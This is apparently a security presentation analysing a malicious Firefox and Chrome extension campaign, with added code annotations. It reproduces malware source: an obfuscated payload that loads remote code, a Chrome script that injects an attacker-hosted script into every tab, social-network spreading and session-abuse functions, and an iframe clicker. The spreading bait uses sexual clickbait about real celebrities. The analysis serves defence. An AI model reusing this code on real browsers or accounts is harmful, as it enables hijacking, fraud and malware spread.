Post on 07-Aug-2015
Agenda
• Simple way to steal credentials
• Click for me
• Executable clicker
• Data from AVAST CommunityIQ userbase
• Summary
• Questions
Payloads for FF and Chrome
// Obfuscated Firefox payload exactly as shown on the slide. The presenter
// replaced identifiers with "EDITED" and the word dictionary at the end has
// only 10 entries although the unpacker expects 110 (`,10,110,`), so this
// listing cannot be unpacked as-is; treat it as an illustration only.
// The outer function is a self-unpacking wrapper: it substitutes every word
// token of the packed string p from the dictionary k and returns the result
// for eval(). "whie(c--)" on the next line looks like a slide transcription
// error for "while(c--)".
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){
whie(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}
// Packed payload. With the surviving dictionary entries (2=this, 3=prefs,
// 6=getCharPref) the recurring `2.3.6("...")` reads as
// this.prefs.getCharPref("..."): the payload keeps its state (an id, a
// timestamp, a URI, an interval) in browser preferences, which matches the
// TestAddon.* prefs on the next slide. The `["@41.40/43-44;1"]` lookup has
// the shape of an XPCOM contract-ID access, consistent with a legacy
// Firefox extension. The member at `58:9(42,26)` XORs each char code of its
// first argument with the second (`24=38^26`) and rebuilds a string — a
// per-character XOR decoder, which would explain the garbled-looking URI
// values stored in prefs. `17:9(){...}` concatenates eight 4-hex-digit
// chunks from Math.random() (`.93(16).92(1)` ≈ toString(16).substring(1)),
// i.e. a 32-hex-char id like TestAddon.guid. The `46:9(...)` member appears
// to issue a request (readyState==4, status==200 checks) and execute the
// response text (`28 56(19.87)()`), i.e. remote code loading — the
// behaviour a defender should look for in extension prefs and reviews.
// All readings beyond the three dictionary words are inferred from the
// token pattern and should be confirmed against an unredacted sample.
('36 39={3:12,10:12,59:9(){2.3=20.50["@41.40/43-44;1"].48(20.33.45).81("39.") ;2.3.79(20.33.78);2.3.77("",2,31);2.10=20.50["@41.40/43-44;1"].48(20.33.45); 11(2.3.6("13")==25||2.3.6("13")=="")52=75;3252=31;11(2.3.6("17")==25||2.3.6("17")==""){2.3.23("17",2.17());2.10.18(12)}11(2.3.6("13")==25||2.3.6("13")==""){2.3.23("13",27.55(283().54()/51));2.10.18(12)}11(2.3.6("35")==25||2.3.6("35")==""){2.3.23("35",60);2.10.18(12)}17=2.3.6("17");13=2.3.6("13");65=(27.55(28 53().54()/51)-2.3.6("35")); 11(52||(13<65)){2.3.23("13",27.55(28 53().54()/51));2.10.18(12);2.46("21","`||71\'\'80&68\'24&76`74}5", 17,8)}},64:9(){36 10=20.50["@41.40/43-44;1"].48(20.33.45);10.18(12)},21:9(7,49){11(2.3.6(7)==25||2.3.6(7)=="") {2.3.23(7,49);2.10.18(12);29 49}32{29 2.3.6(7)}},30:9(7,22,26){11(7=="21"){2.46("69","72>++70}68*73+95*101; 102",22,26)}32{11(2.3.6("47")!=25||2.3.6("47")!=""){2856(2.3.6("47"))()}}},46:9(7,21,22,26){63=2.58(2.21(7,21),26)+""+22+"&24=1&100=99&97="+27.98(27.66()*104);38=2.3;24=2.10;34=2;67{36 19=28 103();19.107 ("109",63); 19.108=9(82){11(19.105==4){11(19.106==96){67{28 56(19.87)()}57(15){34.30(7,22,4)}}32{38.23(7,21);24.18(12); 34.30(7,22,4)}}};19.86()}57(15){34.30(7,22,4)}},58:9(42,26){15="";85(37=0;37<42.83;37++){38=42.84(37);24=38^26;15=15+88.89(24)}29 15},17:9(){36 14=9(){29(((1+27.66())*94)|0).93(16).92(1)};29(14()+14()+14()+14()+14()+14() +14()+14())}};61.62("90",9(15){39.59()},31);61.62("91",9(15){39.64()},31);',10,110,'||this|prefs|||getCharPref|m||EDITED'.split('|'),0,{}));
Change setting in browser
TestAddon.buri user set string lppt >++igg}em*gki+n*tlt;q9
TestAddon.ch default string
TestAddon.date user set string 1340624313
TestAddon.guid user set string 3c94f90903f031a799162872a55742e8
TestAddon.int user set string 60
TestAddon.uri user set string ‘||x2””eakzg9:&i|”b&x’x7}5
j.php content
// Chrome extension background script ("j.php" on the slide). It injects a
// remote <script> tag into the top frame of every tab: once for each tab as
// it finishes loading, and once at startup for every tab already open.
// The snippet passed via `code:` runs inside the tab and appends a <script>
// whose src is an attacker-controlled PHP endpoint, so the real payload is
// whatever that server returns (the presenter redacted the path as
// "EDITED.php"). The two copies of the snippet differ in host (uhnm6.me vs
// uhnm76.me) — possibly a transcription difference on the slide; both are
// the loader's remote endpoint and are the indicator to block/detect.
function updated(tabId, changeInfo, tab){
  // onUpdated fires repeatedly while a page loads; act only on 'complete'.
  if(changeInfo.status == 'complete'){
    chrome.tabs.executeScript(tabId, {code:"if(window==window.top){var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.src='http://uhnm6.me/EDITED.php?v=0.05a';h.appendChild(s);}"}, null);
  }
}
chrome.tabs.onUpdated.addListener(updated);
// getAllInWindow(null, ...) enumerates the tabs of the current window
// (deprecated API, superseded by chrome.tabs.query) and injects into each.
chrome.tabs.getAllInWindow(null,function(tabs){
  for(var i=0;i < tabs.length;i++){
    chrome.tabs.executeScript(tabs[i].id, {code:"if(window==window.top){var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.src='http://uhnm76.me/EDITED.php?v=0.05a';h.appendChild(s);}"}, null);
  }
});
js_f.php
• Two different ways
1. Spreading malware to other people and working as a clicker
2. Only clicker
Spreading malware
• The script updates the victim’s Facebook and Twitter status by posting new status messages
Spreading malware
// Bait data for the spreading code ("Spreading malware" slide). The visible
// fields of videos[0] are an id, a clickbait title and body line, a
// shortened link (bit.ly), an image URL, and several numeric/opaque ids whose
// meaning is not shown on the slide. The array is sized for 10 entries but
// only index 0 is populated in this excerpt; `flk` is created empty here.
var videos = new Array(10);
videos[0] = Array("80", "Kirst*en. Dunst mastur*bating on hidden camera", "It happened in United Stateshotel", "http://bit.ly/MTfe4S", "http://i.imgur.com/NjZPU.jpg", "", "20", "friend", "327065014030715", "431402153539537", "AQBu92VH5GDqrJkp", "2309869772");
var flk = Array();
// `(1 == 1)` is always true — presumably a leftover kill switch. The block
// opened here (and the inner one) continues beyond the slide; the closing
// braces are not part of this excerpt.
if ((1 == 1)) {
// randomnumber is in [0, 99]; `> 0` fails only for 0, so the spreading
// branch runs on 99 of 100 executions.
var randomnumber = Math.floor(Math.random() * 100);
if (randomnumber > 0) {
Spreading malware
// Spreading step. `uri` is the shortened link pushed to victims; the helpers
// get_friends_t, send_msg and post_item are defined elsewhere in the script
// (not on this slide), so the meaning of their "2222" argument is unknown.
var uri = "http://tol.co/5q";
// String.prototype.search takes a regular expression, so "tagged.com" also
// matches e.g. "taggedXcom"; here it is only a site check.
if ((document.location.href.search("tagged.com") > -1)) {
// On tagged.com: fetch friend ids and message each one with the link.
var ids = get_friends_t(1);
if (ids.length > 0) {
// for...in on an array also walks inherited enumerable properties, not only
// indices — fragile if the page has extended Array.prototype.
for (var i in ids) {
send_msg(uri, ids[i], "2222")
}
} else {
// No friend ids returned: post the bait text plus link as a status update.
post_item("LOL Miley Cyrus got caught having s3x " + uri, "2222")
}
}
Functionality
// Makes the victim's account "like" a Facebook page. `fid` (post_form_id)
// and `fbdt` (fb_dtsg, the request token Facebook expects on POSTs) are
// globals harvested elsewhere in the script; because the request is sent
// from the victim's own session the browser attaches their cookies. This is
// abuse of the logged-in session from injected page script, not a Facebook
// vulnerability — the detection angle is the injected script itself.
function likepage(pageid) {
// Form-encoded body; pageid is interpolated without escaping.
var likepost = "fbpage_id=" + pageid + "&add=1&reload=1&preserve_tab=true&nctr[_mod]=pagelet_header&post_form_id=" + fid + "&fb_dtsg=" + fbdt + "&lsd&post_form_id_source=AsyncRequest";
// Local `likepage` shadows the function's own name inside the body.
var likepage = new XMLHttpRequest();
// Relative URL: sent to the origin the script is running on.
likepage.open("POST", "/ajax/pages/fan_status.php?__a=1");
// Fire-and-forget: no handler, the response is never inspected.
likepage.send(likepost)
}
Functionality
// Builds a form body listing the victim's friends for an "available users"
// lookup. get_friends, make_array and the global `uid` are defined elsewhere
// in the script. The body continues past the slide: the request that uses
// `postfields` and the return value are not in this excerpt.
function get_online_friends(limit) {
var friends = get_friends(limit);
// Redeclared with var (same binding, legal); make_array presumably
// normalises whatever get_friends returns into a plain array — not shown.
var friends = make_array(friends);
// Default sort compares as strings, so numeric ids sort lexicographically
// ("10" before "9"); only matters if later code relies on the order.
friends.sort();
var postfields = "user=" + uid;
for (var i = 0; i < friends.length; i++) {
postfields += "&available_user_info_ids[" + i + "]=" + friends[i]
}
Functionality
// Appears to hand a CAPTCHA challenge to a third-party solving service and
// collect the answer (`key` / `challenge`). `output` is allocated but never
// written — the results are assigned onto `post`, the XMLHttpRequest object —
// either a slide transcription error or a real bug. The closing brace of the
// function lies beyond this excerpt.
function get_solved_captcha(extra_challenge_params, opt) {
var output = new Array(3);
var post = new XMLHttpRequest();
// Third argument `false`: synchronous request, so readyState is already 4
// when send() returns. escape() rather than encodeURIComponent() is used on
// the challenge parameter.
post.open("GET", "http://mp56a.com/fn/cs/api/s_c.php?u=" + escape(extra_challenge_params), false);
post.send();
if (post.readyState == 4 && post.status == 200) {
// eval() of the raw response: whoever controls that host can execute
// arbitrary code in the victim's page; JSON.parse would suffice for data.
// `data` is assigned without var, i.e. an implicit global.
data = eval('(' + post.responseText + ')');
console.log(data);
post[1] = data.key;
post[2] = data.challenge
}
Create injected iframe
// DOM helpers for the "clicker" part: a viewport-sized iframe overlay plus
// two small utilities.
function createIframe(src) {
  // Absolutely positioned at 0,0 with 100% width/height, i.e. covering the
  // whole viewport. Nothing here hides it; the slide's "hidden iframe"
  // wording implies extra styling elsewhere that is not shown.
  var ifr = document.createElement("iframe");
  ifr.setAttribute("src", src);
  ifr.style.position = "absolute";
  ifr.style.top = "0";
  ifr.style.left = "0";
  ifr.style.width = "100%";
  ifr.style.height = "100%";
  document.body.appendChild(ifr)
}
// Returns the id of the no-th <img> inside src; `x` leaks as an implicit
// global (no var).
function get_img_src(src, no) {
  x = src.getElementsByTagName("img");
  return x[no].id
}
// Parses an HTML string into a detached <div> via innerHTML. src is treated
// as trusted markup, so anything script-bearing in it is not neutralised.
function make_dom(src) {
  var tempDiv = document.createElement("div");
  tempDiv.innerHTML = src;
  return tempDiv
}
Clicker
• BHO, Firefox and Chrome payloads contain a link to a site like
http://resultsz.com/search/anticheat6.php?username=foreste
• There is a hosted list of sites used by all of those “clickers” for injecting a hidden iframe into every visited site and earning money for the blackhat.
Summary
• Be aware of social engineering
  – Even simple attempts can be successful
• Social networks are used for spreading malware
  – More users == more efficiency
• Trendy topics, celebrities and the latest news are often the starting point for these infection vectors